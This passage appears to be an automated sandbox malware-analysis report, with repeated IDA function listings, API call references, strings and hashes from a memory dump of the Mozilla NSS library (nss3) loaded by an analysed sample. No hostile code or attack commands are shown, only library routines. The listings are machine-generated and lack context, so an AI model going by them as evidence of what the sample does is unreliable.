                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                                                                                                                                                                                            • API String ID: 1003633598-3838449515
                                                                                                                                                                                                                            • Opcode ID: d53752e52c9e1a5d343155dd084c76db37528717ca81985bcecaddc2fd5f4cef
                                                                                                                                                                                                                            • Instruction ID: 84d514a04aa3bd1b7736219d052d0feb99c4a601fa81062350ffef65b6c83a4d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d53752e52c9e1a5d343155dd084c76db37528717ca81985bcecaddc2fd5f4cef
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E41E371A01194AFDB50DF50DD99E8E3BB5EF4330EF494024F409A7A61EB319A58CBA2
                                                                                                                                                                                                                            Function 6CC79C60 Relevance: 27.2, APIs: 18, Instructions: 202threadCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000080), ref: 6CC79C70
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CC79C85
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: calloc.MOZGLUE(00000001,00000084,6CB50936,00000001,?,6CB5102C), ref: 6CC298E5
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6CC79C96
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CB521BC), ref: 6CB4BB8C
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CC79CA9
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CC29946
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAE16B7,00000000), ref: 6CC2994E
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: free.MOZGLUE(00000000), ref: 6CC2995E
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CC79CB9
                                                                                                                                                                                                                            • PR_NewLock.NSS3 ref: 6CC79CC9
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000), ref: 6CC79CDA
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB4BBEB
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CB4BBFB
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: GetLastError.KERNEL32 ref: 6CB4BC03
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CB4BC19
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: free.MOZGLUE(00000000), ref: 6CB4BC22
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(?), ref: 6CC79CF0
                                                                                                                                                                                                                            • PR_NewPollableEvent.NSS3 ref: 6CC79D03
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_CallOnce.NSS3(6CCC14B0,6CC6F510), ref: 6CC6F3E6
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_CreateIOLayerStub.NSS3(6CCC006C), ref: 6CC6F402
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_Malloc.NSS3(00000004), ref: 6CC6F416
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CC6F42D
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_SetSocketOption.NSS3(?), ref: 6CC6F455
                                                                                                                                                                                                                              • Part of subcall function 6CC6F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CC6F473
                                                                                                                                                                                                                              • Part of subcall function 6CC29890: TlsGetValue.KERNEL32(?,?,?,6CC297EB), ref: 6CC2989E
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CC79D78
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CC79DAF
                                                                                                                                                                                                                            • _PR_CreateThread.NSS3(00000000,6CC79EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CC79D9F
                                                                                                                                                                                                                              • Part of subcall function 6CB4B3C0: TlsGetValue.KERNEL32 ref: 6CB4B403
                                                                                                                                                                                                                              • Part of subcall function 6CB4B3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6CB4B459
                                                                                                                                                                                                                            • _PR_CreateThread.NSS3(00000000,6CC7A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CC79DE8
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CC79DFC
                                                                                                                                                                                                                            • _PR_CreateThread.NSS3(00000000,6CC7A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CC79E29
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CC79E3D
                                                                                                                                                                                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CC79E71
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CC79E89
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4254102231-0
                                                                                                                                                                                                                            • Opcode ID: 435e6411dcbfca7767b1a1d5ac08c6ebdc512b4a5b5b390be53331a5595c13ca
                                                                                                                                                                                                                            • Instruction ID: fc93a74b2a185587bb3034a30437d87585596c1cd0daf9309934b13c8ea15ed0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 435e6411dcbfca7767b1a1d5ac08c6ebdc512b4a5b5b390be53331a5595c13ca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59613DB1A00B06AFD720DF75D884A6BBBF8FF09208B044529E859C7B51F770E854CBA1
                                                                                                                                                                                                                            Function 6CB94CD0 Relevance: 26.4, APIs: 9, Strings: 6, Instructions: 120COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CB94CF3
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB94D28
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB94D37
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB94D4D
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CB94D7B
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB94D8A
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB94DA0
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CB94DBC
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CB94E20
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                                                                                                                                                                                            • API String ID: 1003633598-3553622718
                                                                                                                                                                                                                            • Opcode ID: 0b763859edc9a75b48bbe2a4e8b827df34756f87ee088ed5d63460c9f53e2264
                                                                                                                                                                                                                            • Instruction ID: 45d9e4ba7995fa5da5b8e3e1b05da6fe94c531a425cec798079bd8ab3591409c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b763859edc9a75b48bbe2a4e8b827df34756f87ee088ed5d63460c9f53e2264
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E41E575601154AFDB149F10DD99FAA3B75EF4330EF094035E418ABA21EB319E48CFA2
                                                                                                                                                                                                                            Function 6CB97C90 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 110COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_Verify), ref: 6CB97CB6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB97CE4
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB97CF3
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB97D09
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CB97D2A
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CB97D45
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CB97D5E
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CB97D77
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                                                                                                                                                                                            • API String ID: 1003633598-3278097884
                                                                                                                                                                                                                            • Opcode ID: fdf7da747c88dfa983889f7c714f4956c708f37b9fca45c33f049adea92ee018
                                                                                                                                                                                                                            • Instruction ID: b158b7288ad221ecc0e38b5519c5df1dcaa06ec584b1aac29aaa02d1ae6047f4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdf7da747c88dfa983889f7c714f4956c708f37b9fca45c33f049adea92ee018
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2031D1B1601195AFDB109F64DC59FAE3BF1EF4331DF494024E408A7A21EB719A49CBA2
                                                                                                                                                                                                                            Function 6CC2CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CC2CC7B), ref: 6CC2CD7A
                                                                                                                                                                                                                              • Part of subcall function 6CC2CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CB9C1A8,?), ref: 6CC2CE92
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC2CDA5
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC2CDB8
                                                                                                                                                                                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6CC2CDDB
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC2CD8E
                                                                                                                                                                                                                              • Part of subcall function 6CB505C0: PR_EnterMonitor.NSS3 ref: 6CB505D1
                                                                                                                                                                                                                              • Part of subcall function 6CB505C0: PR_ExitMonitor.NSS3 ref: 6CB505EA
                                                                                                                                                                                                                            • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CC2CDE8
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CC2CDFF
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CC2CE16
                                                                                                                                                                                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CC2CE29
                                                                                                                                                                                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6CC2CE48
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                                                                                                                            • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                                                                                                                            • API String ID: 601260978-871931242
                                                                                                                                                                                                                            • Opcode ID: f53cd3b62799e728e0d9a564b07f6115d8f8db555451b6b17c5fc271cdcc2341
                                                                                                                                                                                                                            • Instruction ID: 84af758e003913e8f840bcc269875a6debb2cb1d127d1aef9ce8ad2dbe203796
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f53cd3b62799e728e0d9a564b07f6115d8f8db555451b6b17c5fc271cdcc2341
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7C112EFAE0315162FB117E7A7C10AAE3968AF0214CF580535D805D1F00FB29CA2887F6
                                                                                                                                                                                                                            Function 6CC71C60 Relevance: 25.6, APIs: 17, Instructions: 114COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CC713BC,?,?,?,6CC71193), ref: 6CC71C6B
                                                                                                                                                                                                                            • PR_NewLock.NSS3(?,6CC71193), ref: 6CC71C7E
                                                                                                                                                                                                                              • Part of subcall function 6CC298D0: calloc.MOZGLUE(00000001,00000084,6CB50936,00000001,?,6CB5102C), ref: 6CC298E5
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,6CC71193), ref: 6CC71C91
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6CB521BC), ref: 6CB4BB8C
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,?,6CC71193), ref: 6CC71CA7
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB4BBEB
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6CB4BBFB
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: GetLastError.KERNEL32 ref: 6CB4BC03
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6CB4BC19
                                                                                                                                                                                                                              • Part of subcall function 6CB4BB80: free.MOZGLUE(00000000), ref: 6CB4BC22
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,6CC71193), ref: 6CC71CBE
                                                                                                                                                                                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CC71193), ref: 6CC71CD4
                                                                                                                                                                                                                            • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CC71193), ref: 6CC71CFE
                                                                                                                                                                                                                            • PR_Lock.NSS3(?,?,?,?,?,?,?,6CC71193), ref: 6CC71D1A
                                                                                                                                                                                                                              • Part of subcall function 6CC29BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6CB51A48), ref: 6CC29BB3
                                                                                                                                                                                                                              • Part of subcall function 6CC29BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6CB51A48), ref: 6CC29BC8
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CC71193), ref: 6CC71D3D
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: TlsGetValue.KERNEL32 ref: 6CC0DD8C
                                                                                                                                                                                                                              • Part of subcall function 6CC0DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC0DDB4
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,6CC71193), ref: 6CC71D4E
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CC71193), ref: 6CC71D64
                                                                                                                                                                                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CC71193), ref: 6CC71D6F
                                                                                                                                                                                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CC71193), ref: 6CC71D7B
                                                                                                                                                                                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CC71193), ref: 6CC71D87
                                                                                                                                                                                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CC71193), ref: 6CC71D93
                                                                                                                                                                                                                            • PR_DestroyLock.NSS3(00000000,?,?,6CC71193), ref: 6CC71D9F
                                                                                                                                                                                                                            • free.MOZGLUE(00000000,?,6CC71193), ref: 6CC71DA8
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3246495057-0
                                                                                                                                                                                                                            • Opcode ID: 7400bb7d9900fca2fd4476fe4bb9a77d0b5675865a45bb6e2ad0816ab0e044fb
                                                                                                                                                                                                                            • Instruction ID: 8218cdeaeafe24bf8fc3b0557883461bc66d91a9e12ad9f56e11a3a5c7c615e1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7400bb7d9900fca2fd4476fe4bb9a77d0b5675865a45bb6e2ad0816ab0e044fb
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1431C2F1E007415BEB219F79AC51A6B7AF4EF1560CB044438E94A87B41FB31E518CBB2
                                                                                                                                                                                                                            Function 6CBC5CA0 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CBC5EC0,00000000,?,?), ref: 6CBC5CBE
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CBC5CD7
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CBC5CF0
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CBC5D09
                                                                                                                                                                                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CBC5EC0,00000000,?,?), ref: 6CBC5D1F
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CBC5D3C
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC5D51
                                                                                                                                                                                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC5D66
                                                                                                                                                                                                                            • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CBC5D80
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: strncmp$SecureStrdup_Util
                                                                                                                                                                                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                                                                                                                                                                                            • API String ID: 1171493939-3017051476
                                                                                                                                                                                                                            • Opcode ID: d9bc996ebc4d718b1c2196ee17579ea97c7a93a960e071550f44208ee6408028
                                                                                                                                                                                                                            • Instruction ID: 2a24d61eb77ef4feaac13dd28621a648b89625531e9bc331ad738d18e503afb6
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d9bc996ebc4d718b1c2196ee17579ea97c7a93a960e071550f44208ee6408028
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B31D6B07413E29BE7411AA49C8CF663768EF12349F140030FD96E6A81FB61E51AD35F
                                                                                                                                                                                                                            Function 6CBC6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CC91DE0,?), ref: 6CBC6CFE
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBC6D26
                                                                                                                                                                                                                            • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CBC6D70
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000480), ref: 6CBC6D82
                                                                                                                                                                                                                            • DER_GetInteger_Util.NSS3(?), ref: 6CBC6DA2
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CBC6DD8
                                                                                                                                                                                                                            • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CBC6E60
                                                                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CBC6F19
                                                                                                                                                                                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6CBC6F2D
                                                                                                                                                                                                                            • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CBC6F7B
                                                                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBC7011
                                                                                                                                                                                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CBC7033
                                                                                                                                                                                                                            • free.MOZGLUE(?), ref: 6CBC703F
